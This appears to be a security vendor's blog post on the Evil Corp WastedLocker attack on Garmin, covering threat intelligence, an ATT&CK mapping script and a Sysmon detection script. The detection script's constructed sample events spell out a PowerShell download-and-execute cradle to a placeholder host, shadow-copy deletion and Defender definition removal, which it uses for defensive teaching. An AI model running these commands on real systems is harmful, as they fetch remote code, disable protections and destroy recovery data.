Garmin users noticed their devices were not working on July 22, 2020; anyone visiting the Garmin website was shown the image below. It would not be until a week later that most Garmin services were operational again. As more information was made public, we learned the attack was attributed to a threat group known as Evil Corp and that they leveraged a fairly new ransomware called WastedLocker. This blog post dives deeper into the Garmin attack: we extract TTPs from Cyber Threat Intelligence, create a MITRE ATT&CK Navigator Layer and adversary emulation plan, emulate the attack with Cobalt Strike (as Evil Corp did) and then drop a synthetic WastedLocker built with SCYTHE, and discuss how to defend against ransomware attacks with Olaf Hartong. This blog post is a summary of the DEF CON Red Team Village talk; slides are available here and the video of the presentation is below.


    Cyber Threat Intelligence

    News of the Garmin attack started coming in on July 22, 2020. Eventually we learned all Garmin services were down for about a week:



We found, through Cyber Threat Intelligence, that the group responsible for the attack is Evil Corp and that they used a ransomware called WastedLocker. This group is not documented on the MITRE ATT&CK site, so we had to review the below Cyber Threat Intelligence, extract the TTPs, and map them to MITRE ATT&CK:

    Evil Corp, as a threat group, is more sophisticated than the standard ransomware attack in that they manually interact with the target, move laterally through a number of systems, and then drop the ransomware. In this case, they dropped WastedLocker. At a high level, this is how the attack works:

    • SocGholish is delivered to the victim in a zipped file via compromised legitimate websites
    • The zip file contains malicious JavaScript masquerading as a browser update
    • A second JavaScript file profiles the computer and uses PowerShell to download additional discovery-related PowerShell scripts
    • Once the attackers gain network access, they use Cobalt Strike commodity malware with living-off-the-land tools to steal credentials, escalate privileges, and move across the network to deploy WastedLocker on multiple computers
    • PowerShell is used to download and execute a loader from a domain publicly reported as being used to deliver Cobalt Strike as part of WastedLocker attacks
    • An injected payload, known as Cobalt Strike Beacon, is used to execute commands, inject into other processes, elevate current processes or impersonate other processes, and upload and download files
    • Privilege escalation is performed using a publicly documented technique involving the Software Licensing User Interface tool, a command line utility responsible for activating and updating the Windows operating system
    • The attackers use the Windows Management Instrumentation Command Line Utility to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts
    • The attackers launch a legitimate command line tool for managing Windows Defender to disable scanning of all downloaded files and attachments, remove all installed definitions, and, in some cases, disable real-time monitoring
    • The Windows Sysinternals tool PsExec is used to launch the WastedLocker ransomware, which then begins encrypting data and deleting shadow volumes

    Here is a screenshot of what the end user would see:

    https://blog.malwarebytes.com/threat-spotlight/2020/07/threat-spotlight-wastedlocker-customized-ransomware/

    While the Cyber Threat Intelligence from NCC Group and Symantec has good detail, it is not mapped to MITRE ATT&CK, so we did the mapping using ATT&CK Navigator and shared the JSON in the SCYTHE Community Threats GitHub. Here is a direct link to the Navigator Layer shown below:

    Figure 1: Evil Corp with WastedLocker ATT&CK Navigator Layer

    Adversary Emulation Plan

    Is emulating ransomware even possible? Of course it is! The secret is to never encrypt or destroy production data. Instead, create new files first and then run the typical ransomware steps of encrypting, exfiltrating, and dropping a ransom note against those files only. This method ensures no real data is ever at risk of being encrypted, destroyed, or leaked.

    First, we build a threat profile for Evil Corp and WastedLocker:

    Tactic                   Technique
    Initial Access           T1189 - Drive-by Compromise
    Command and Control      T1071 - Application Layer Protocol
                             T1071.001 - Web Protocols
                             T1573 - Encrypted Channel
                             T1573.002 - Asymmetric Cryptography
    Execution                T1059 - Command and Scripting Interpreter
                             T1059.001 - PowerShell
                             T1059.007 - JavaScript/JScript
                             T1569 - System Services
                             T1569.002 - Service Execution
                             T1204 - User Execution
                             T1204.002 - Malicious File
                             T1047 - Windows Management Instrumentation
    Defense Evasion          T1564 - Hide Artifacts
                             T1564.004 - NTFS File Attributes
                             T1562 - Impair Defenses
                             T1562.001 - Disable or Modify Tools
    Discovery                T1087 - Account Discovery
                             T1087.001 - Local Account
                             T1087.002 - Domain Account
                             T1033 - System Owner/User Discovery
    Privilege Escalation     T1548 - Abuse Elevation Control Mechanism
                             T1548.002 - Bypass User Access Control
    Lateral Movement         T1570 - Lateral Tool Transfer
                             T1021.002 - SMB/Windows Admin Shares
    Impact                   T1485 - Data Destruction
                             T1486 - Data Encrypted for Impact
                             T1565 - Data Manipulation
                             T1565.001 - Stored Data Manipulation
                             T1490 - Inhibit System Recovery
                             T1489 - Service Stop
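    The threat profile above is what gets turned into the ATT&CK Navigator Layer. The script below is an added example for this post, not the JSON SCYTHE published in its Community Threats GitHub: it takes the tactic-to-technique mapping from the table, validates the technique IDs, and emits a Navigator layer file. The version numbers, highlight colour and gradient are assumptions based on the Navigator layer format, so adjust them to the Navigator release you load the file into.

```python
"""Build a MITRE ATT&CK Navigator layer (JSON) from a tactic -> technique map.

Added example for this post; not SCYTHE's published layer. The layer-format
field values (versions, colours, gradient) are assumptions about the Navigator
layer format and are not taken from the post.
"""
import json
import re

# Techniques from the Evil Corp / WastedLocker threat profile table in this post.
# Sub-techniques are listed under the same tactic as their parent technique.
THREAT_PROFILE = {
    "Initial Access": ["T1189"],
    "Command and Control": ["T1071", "T1071.001", "T1573", "T1573.002"],
    "Execution": ["T1059", "T1059.001", "T1059.007", "T1569", "T1569.002",
                  "T1204", "T1204.002", "T1047"],
    "Defense Evasion": ["T1564", "T1564.004", "T1562", "T1562.001"],
    "Discovery": ["T1087", "T1087.001", "T1087.002", "T1033"],
    "Privilege Escalation": ["T1548", "T1548.002"],
    "Lateral Movement": ["T1570", "T1021.002"],
    "Impact": ["T1485", "T1486", "T1565", "T1565.001", "T1490", "T1489"],
}

# ATT&CK technique IDs look like T1059 or T1059.001 (sub-technique).
TECHNIQUE_ID = re.compile(r"^T\d{4}(\.\d{3})?$")


def tactic_slug(name):
    """Navigator expects tactic names as lowercase, hyphen-separated slugs."""
    return name.strip().lower().replace(" ", "-")


def build_layer(profile, name, description=""):
    """Return a Navigator layer dict with one entry per (tactic, technique)."""
    techniques = []
    for tactic, ids in profile.items():
        for tid in ids:
            if not TECHNIQUE_ID.match(tid):
                raise ValueError(f"not an ATT&CK technique ID: {tid!r}")
            techniques.append({
                "techniqueID": tid,
                "tactic": tactic_slug(tactic),
                "score": 1,
                "color": "#fd8d3c",          # assumed highlight colour
                "enabled": True,
                "comment": "",
                # expand parents so their sub-techniques are visible
                "showSubtechniques": "." not in tid,
            })
    return {
        "name": name,
        "description": description,
        "domain": "enterprise-attack",
        # assumed version fields; match them to your Navigator release
        "versions": {"attack": "8", "navigator": "4.0", "layer": "4.0"},
        "techniques": techniques,
        "gradient": {"colors": ["#ffffff", "#ff6666"],
                     "minValue": 0, "maxValue": 1},
    }


def to_json(layer):
    return json.dumps(layer, indent=2)


def load_layer(text):
    """Parse a layer back and sanity-check the fields Navigator needs."""
    layer = json.loads(text)
    for t in layer["techniques"]:
        if not TECHNIQUE_ID.match(t["techniqueID"]):
            raise ValueError(f"bad technique in layer: {t}")
    return layer


def technique_count(layer):
    return len(layer["techniques"])


if __name__ == "__main__":
    layer = build_layer(THREAT_PROFILE, "Evil Corp - WastedLocker",
                        "TTPs extracted from public CTI (NCC Group, Symantec)")
    print(to_json(layer))
```

    Write the output to a `.json` file and open it in ATT&CK Navigator to get the same kind of heat map shown in Figure 1; the same mapping dictionary is what an emulation plan walks through step by step.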

    Given that Evil Corp used Cobalt Strike for manual lateral movement, we demo how to get a Cobalt Strike Beacon using PowerShell, just as Evil Corp did. Then we use Cobalt Strike to drop the WastedLocker ransomware we created with SCYTHE. The synthetic malware is available on our Community Threats GitHub for Evil Corp and was created with the below steps:

    Defend against WastedLocker

    We had the pleasure of sitting down with industry thought leader and newly awarded Microsoft MVP Olaf Hartong to discuss how to defend against ransomware attacks. Given that there are many strains of ransomware in the wild, it is important to focus on the behaviors ransomware has shown in the past and to keep monitoring as these criminal gangs evolve.

    Olaf gives us an introduction to Sysmon, a Windows system service and device driver that monitors and logs system activity to the Windows event log. It provides detailed information about process creations, network connections, and changes to file creation time. By collecting the events it generates using Windows Event Collection or SIEM agents and subsequently analyzing them, you can identify malicious or anomalous activity and understand how intruders and malware operate on your network.
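    To make the Sysmon discussion concrete, and to tie it back to the attack chain in the Cyber Threat Intelligence section above, here is an added example (not code from SCYTHE or Olaf Hartong) of what the behavioral detection looks like once Sysmon events have been collected. It runs simple rules for the WastedLocker behaviors this post describes (PowerShell download cradle, WMIC remote process creation, Defender definition removal, shadow copy deletion, processes spawned by the PsExec service, and a burst of file creations suggesting encryption) over constructed Event ID 1 and Event ID 11 records. The event records, host names, paths and file extension are all made up for the example; in production the same logic would run in your SIEM against events forwarded by Windows Event Collection.

```python
"""Flag WastedLocker-style behaviours in collected Sysmon events.

Added example; not SCYTHE's or Olaf Hartong's code. SAMPLE_EVENTS below are
constructed to look like Sysmon Event ID 1 (process create) and Event ID 11
(file create) records after collection; they are not telemetry from the incident.
"""
import re
from collections import Counter

# (rule name, ATT&CK technique, regex on Image, regex on CommandLine,
#  regex on ParentImage). An empty pattern matches anything.
PROCESS_RULES = [
    ("PowerShell download cradle", "T1059.001",
     r"powershell\.exe$",
     r"(downloadstring|downloadfile|net\.webclient|invoke-webrequest)", r""),
    ("WMIC remote process creation", "T1047",
     r"wmic\.exe$", r"/node:\S+.*process\s+call\s+create", r""),
    ("Defender definitions removed via MpCmdRun", "T1562.001",
     r"mpcmdrun\.exe$", r"-removedefinitions", r""),
    ("Shadow copies deleted", "T1490",
     r"(vssadmin|wmic)\.exe$", r"(delete\s+shadows|shadowcopy\s+delete)", r""),
    ("Process spawned by the PsExec service", "T1569.002",
     r"", r"", r"psexesvc\.exe$"),
]

# Number of Event ID 11 file creates by one process in the sample that we
# treat as an encryption burst (tune to your environment and window size).
FILE_BURST_THRESHOLD = 5


def _match(pattern, value):
    return not pattern or re.search(pattern, value, re.IGNORECASE) is not None


def detect(events):
    """Return a list of (rule name, technique, image) hits over the events."""
    hits = []
    creates = Counter()
    for ev in events:
        if ev["EventID"] == 1:
            for name, tech, img, cmd, parent in PROCESS_RULES:
                if (_match(img, ev["Image"])
                        and _match(cmd, ev.get("CommandLine", ""))
                        and _match(parent, ev.get("ParentImage", ""))):
                    hits.append((name, tech, ev["Image"]))
        elif ev["EventID"] == 11:
            creates[ev["Image"]] += 1
    for image, n in creates.items():
        if n >= FILE_BURST_THRESHOLD:
            hits.append(("File-creation burst (possible encryption)", "T1486", image))
    return hits


# Constructed sample: one event per behaviour, one benign event, then a
# burst of file creates by the same process PsExec launched.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://update.example.invalid/p')\"",
     "ParentImage": r"C:\Windows\System32\wscript.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic /node:FILESRV01 process call create "
                    "\"powershell -f \\\\FILESRV01\\c$\\temp\\disc.ps1\"",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "CommandLine": "MpCmdRun.exe -RemoveDefinitions -All",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin delete shadows /all /quiet",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\wl.exe", "CommandLine": "wl.exe",
     "ParentImage": r"C:\Windows\PSEXESVC.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
] + [
    {"EventID": 11, "Image": r"C:\Windows\wl.exe",
     "TargetFilename": rf"C:\Users\alice\Documents\report{i}.docx.enc"}
    for i in range(6)
]

if __name__ == "__main__":
    for name, tech, image in detect(SAMPLE_EVENTS):
        print(f"[{tech}] {name}: {image}")
```

    Every rule here keys on behavior rather than on a hash or file name, which is the point Olaf makes: the ransomware binary changes between campaigns, but disabling Defender, deleting shadow copies and launching a payload through PsExec show up in Sysmon the same way each time.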

    Conclusion

    Ransomware is evolving and getting more sophisticated. Evil Corp uses a number of tools to gain initial access, manually move laterally around the target environment, and then drop the ransomware. In this post, we consumed the Cyber Threat Intelligence as it came out, extracted TTPs, mapped them to MITRE ATT&CK and created a Navigator Layer, created an adversary emulation plan and shared it on our GitHub, demoed the emulation, and discussed defending against ransomware with Olaf Hartong. We hope you enjoyed this blog post, which is a summary of the DEF CON Red Team Village talk; slides are available here.

    This Threat Thursday post discusses active research by SCYTHE and other cited third parties into an ongoing threat. The information in this post should be considered preliminary and may be updated as research continues. This information is provided "as-is" without any warranty or condition of any kind, either express or implied.

    About SCYTHE

    SCYTHE provides an advanced attack emulation platform for the enterprise and cybersecurity consulting market. The SCYTHE platform enables Red, Blue, and Purple teams to build and emulate real-world adversarial campaigns in a matter of minutes. Customers are in turn enabled to validate the risk posture and exposure of their business and employees and the performance of enterprise security teams and existing security solutions. Based in Arlington, VA, the company is privately held and is funded by Gula Tech Adventures, Paladin Capital, Evolution Equity, and private industry investors. For more information email info@scythe.io, visit https://scythe.io, or follow on Twitter @scythe_io


    Post by Jorge Orchilles
    August 6, 2020